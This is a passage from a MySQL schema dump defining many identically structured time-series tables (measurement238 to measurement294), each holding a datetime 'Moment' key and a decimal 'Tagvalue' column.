) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement238`
--
DROP TABLE IF EXISTS `measurement238`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement238` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement239`
--
DROP TABLE IF EXISTS `measurement239`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement239` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement24`
--
DROP TABLE IF EXISTS `measurement24`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement24` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement240`
--
DROP TABLE IF EXISTS `measurement240`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement240` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement241`
--
DROP TABLE IF EXISTS `measurement241`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement241` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement242`
--
DROP TABLE IF EXISTS `measurement242`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement242` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement243`
--
DROP TABLE IF EXISTS `measurement243`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement243` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement244`
--
DROP TABLE IF EXISTS `measurement244`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement244` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement245`
--
DROP TABLE IF EXISTS `measurement245`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement245` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement246`
--
DROP TABLE IF EXISTS `measurement246`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement246` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement247`
--
DROP TABLE IF EXISTS `measurement247`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement247` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement248`
--
DROP TABLE IF EXISTS `measurement248`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement248` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement249`
--
DROP TABLE IF EXISTS `measurement249`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement249` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement25`
--
DROP TABLE IF EXISTS `measurement25`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement25` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement250`
--
DROP TABLE IF EXISTS `measurement250`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement250` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement251`
--
DROP TABLE IF EXISTS `measurement251`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement251` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement252`
--
DROP TABLE IF EXISTS `measurement252`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement252` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement253`
--
DROP TABLE IF EXISTS `measurement253`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement253` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement254`
--
DROP TABLE IF EXISTS `measurement254`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement254` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement255`
--
DROP TABLE IF EXISTS `measurement255`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement255` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement256`
--
DROP TABLE IF EXISTS `measurement256`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement256` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement257`
--
DROP TABLE IF EXISTS `measurement257`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement257` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement258`
--
DROP TABLE IF EXISTS `measurement258`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement258` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement259`
--
DROP TABLE IF EXISTS `measurement259`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement259` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement26`
--
DROP TABLE IF EXISTS `measurement26`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement26` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement260`
--
DROP TABLE IF EXISTS `measurement260`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement260` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement261`
--
DROP TABLE IF EXISTS `measurement261`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement261` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement262`
--
DROP TABLE IF EXISTS `measurement262`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement262` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement263`
--
DROP TABLE IF EXISTS `measurement263`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement263` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement264`
--
DROP TABLE IF EXISTS `measurement264`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement264` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement265`
--
DROP TABLE IF EXISTS `measurement265`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement265` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement266`
--
DROP TABLE IF EXISTS `measurement266`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement266` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement267`
--
DROP TABLE IF EXISTS `measurement267`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement267` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement268`
--
DROP TABLE IF EXISTS `measurement268`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement268` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement269`
--
DROP TABLE IF EXISTS `measurement269`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement269` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement27`
--
DROP TABLE IF EXISTS `measurement27`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement27` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement270`
--
DROP TABLE IF EXISTS `measurement270`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement270` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement271`
--
DROP TABLE IF EXISTS `measurement271`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement271` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement272`
--
DROP TABLE IF EXISTS `measurement272`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement272` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement273`
--
DROP TABLE IF EXISTS `measurement273`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement273` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement274`
--
DROP TABLE IF EXISTS `measurement274`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement274` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement275`
--
DROP TABLE IF EXISTS `measurement275`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement275` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement276`
--
DROP TABLE IF EXISTS `measurement276`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement276` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement277`
--
DROP TABLE IF EXISTS `measurement277`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement277` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement278`
--
DROP TABLE IF EXISTS `measurement278`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement278` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement279`
--
DROP TABLE IF EXISTS `measurement279`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement279` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement28`
--
DROP TABLE IF EXISTS `measurement28`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement28` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement280`
--
DROP TABLE IF EXISTS `measurement280`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement280` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement281`
--
DROP TABLE IF EXISTS `measurement281`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement281` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement282`
--
DROP TABLE IF EXISTS `measurement282`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement282` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement283`
--
DROP TABLE IF EXISTS `measurement283`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement283` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement284`
--
DROP TABLE IF EXISTS `measurement284`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement284` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement285`
--
DROP TABLE IF EXISTS `measurement285`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement285` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement286`
--
DROP TABLE IF EXISTS `measurement286`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement286` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement287`
--
DROP TABLE IF EXISTS `measurement287`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement287` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement288`
--
DROP TABLE IF EXISTS `measurement288`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement288` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement289`
--
DROP TABLE IF EXISTS `measurement289`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement289` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement29`
--
DROP TABLE IF EXISTS `measurement29`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement29` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement290`
--
DROP TABLE IF EXISTS `measurement290`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement290` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement291`
--
DROP TABLE IF EXISTS `measurement291`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement291` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement292`
--
DROP TABLE IF EXISTS `measurement292`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement292` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement293`
--
DROP TABLE IF EXISTS `measurement293`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement293` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement294`
--
DROP TABLE IF EXISTS `measurement294`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement294` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement295`
--
DROP TABLE IF EXISTS `measurement295`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
